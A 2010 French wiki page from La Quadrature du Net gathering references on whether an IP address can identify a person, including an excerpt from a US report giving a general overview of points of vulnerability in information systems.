Doctrine adresse IP

De La Quadrature du Net
Révision datée du 10 février 2010 à 16:49 par Meriem (discussion | contributions)
(diff) ← Version précédente | Voir la version actuelle (diff) | Version suivante → (diff)
Aller à la navigationAller à la recherche
  • http://dmca.cs.washington.edu/
    • « We were able to generate hundreds of real DMCA takedown notices for computers at the University of Washington that never downloaded nor shared any content whatsoever. »
    • « We were able to remotely generate complaints for nonsense devices including several printers. »
  • Julian Green acquitté après avoir été accusé de posséder des images pornographiques sur son PC; il s'agissait d'un cheval de Troye. Le NYT indique que c'est le premier cas d'un accusé utilisant cette défense.
  • Security Engineering de Ross Anderson. Certains chapitres de la seconde édition sont disponibles online, la première l'est intégralement. Le problème c'est qu'il est exhaustif, mais il doit sûrement y avoir la "bonne" phrase.
  • Usurpation d'adresse IP Présentation d'Hervé Schauer - HSC - sur les techniques d'IP Spoofing (1999).
  • références de wikipedia:

                                       BOX 2.4
             Possible Points of Vulnerability in Information
                     Technology Systems and Networks
       An information technology system or network has many places where an
operationally exploitable vulnerability can be found; in principle, a completely jus-
tifiable trust in the system can be found only in environments that are completely
under the control of the party who cares most about the security of the system.
As discussed here, the environment consists of many things—all of which must
be under the interested party’s control.
       The software is the most obvious set of vulnerabilities. In a running operating
system or application, exploitable vulnerabilities may be present as the result of
faulty program design or implementation, and viruses or worms may be introduced
when the system or network comes in electronic contact with a hostile source. But
there are more subtle paths by which vulnerabilities can be introduced as well.
For example, compilers are used to generate object code from source code. The
compiler itself must be secure, for it could introduce object code that subversively
and subtly modifies the functionality represented in the source code. A particular
sequence of instructions could exploit an obscure and poorly known characteristic
of hardware functioning, which means that programmers well versed in minute
behavioral details of the machine on which the code will be running could introduce
functionality that would likely go undetected in any review of the code.
       The hardware constitutes another set of vulnerabilities, although less atten-
tion is usually paid to hardware in this regard. Hardware includes microprocessors,
microcontrollers, firmware, circuit boards, power supplies, peripherals such as
printers or scanners, storage devices, and communications equipment such as
network cards. On the one hand, hardware is physical, so tampering with these
components requires physical access at some point in the hardware’s life cycle,
which may be difficult to obtain. On the other hand, hardware is difficult to inspect,
so hardware compromises are hard to detect. Consider, for example, that graph-
ics display cards often have onboard processors and memory that can support an
execution stream entirely separate from that running on a system’s “main” proces-
sor. Also, peripheral devices, often with their own microprocessor controllers and
programs, can engage in bidirectional communications with their hosts, providing
a possible vector for outside influence. And, of course, many systems rely on a
field-upgradable read-only memory (ROM) chip to support a boot sequence—and
corrupted or compromised ROMs could prove harmful in many situations.
       The communications channels between the system or network and the “out-
side” world present another set of vulnerabilities. In general, a system that does not
interact with anyone is secure, but it is also largely useless. Thus, communications
of some sort must be established, and those channels can be compromised—for
example, by spoofing (an adversary pretends to be the “authorized” system), by
jamming (an adversary denies access to anyone else), or by eavesdropping (an
adversary obtains information intended to be confidential).
       Operators and users present a particularly challenging set of vulnerabilities.
Both can be compromised through blackmail or extortion. Or, untrustworthy opera-
tors and users can be planted as spies. But users can also be tricked into actions
that compromise security. For example, in one recent exploit, a red team used
inexpensive universal serial bus (USB) flash drives to penetrate an organization’s
security. The red team scattered USB drives in parking lots, smoking areas, and
other areas of high traffic. In addition to some innocuous images, each drive was
preprogrammed with software that would collect passwords, log-ins, and machine-
specific information from the user’s computer, and then e-mail the findings to the
red team. Because many systems support an “auto-run” feature for insertable
media (i.e., when the medium is inserted, the system automatically runs a program
named “autorun.exe” on the medium) and the feature is often turned on, the red
team was notified as soon as the drive was inserted. The result: 75 percent of the
USB drives distributed were inserted into a computer.
        Given the holistic nature of security, it is also worth noting that vulnerabilities
can be introduced at every point in the supply chain: that is, systems (and their
components) can be attacked in design, development, testing, production, distri-
bution, installation, configuration, maintenance, and operation. On the way to a
customer, a set of CD-ROMs may be intercepted and a different set introduced in
its place; extra functionality might be introduced during chip fabrication or moth-
erboard assembly; a default security configuration might be left in an insecure
state—and the list goes on.
        Given the dependence of security on all of these elements in the supply chain,
it is not unreasonable to think of security as an emergent property of a system, as
its architecture is implemented, its code instantiated, and as the system itself is
embedded in a human and an organizational context. In practice, this means that
the actual vulnerabilities that a system must resist are specific to that particular
system embedded in its particular context. This fact should not discourage the
development of generic building blocks for security that might be assembled in a
system-specific way, but it does mean that an adversary could attack many pos-
sible targets in its quest to compromise a system or a network.
SOURCES:
    	 Information on compilers based on Ken Thompson, “Reflections on Trusting Trust,” Com-
munications of the ACM, 27(8): 761-763, August 1984. See also P.A. Karger and R.R. Schell,
“Thirty Years Later: Lessons from the Multics Security Evaluation,” pp. 119-126 in Proceedings
of the 18th Annual Computer Security Applications Conference, December 9-13, 2002, Las
Vegas, Nev.: IEEE Computer Society. Available at http://www.acsa-admin.org/2002/papers/
classic-multics.pdf.
    	 Information on USB drive: See Steve Stasiukonis, “Social Engineering, the USB Way,”
Dark Reading, June 7, 2006. Available at http://www.darkreading.com/document.asp?doc_
id=95556&WT.svl=column1_1.
    	 Information on chip fabrication based on Defense Science Board, High Performance
Microchip Supply, Department of Defense, February 2005; available at http://www.acq.osd.
mil/dsb/reports/2005-02-HPMS_Report_Final.pdf.

Source: Toward a Safer and More Secure Cyberspace http://www.cyber.st.dhs.gov/docs/Toward_a_Safer_and_More_Secure_Cyberspace-Full_report.pdf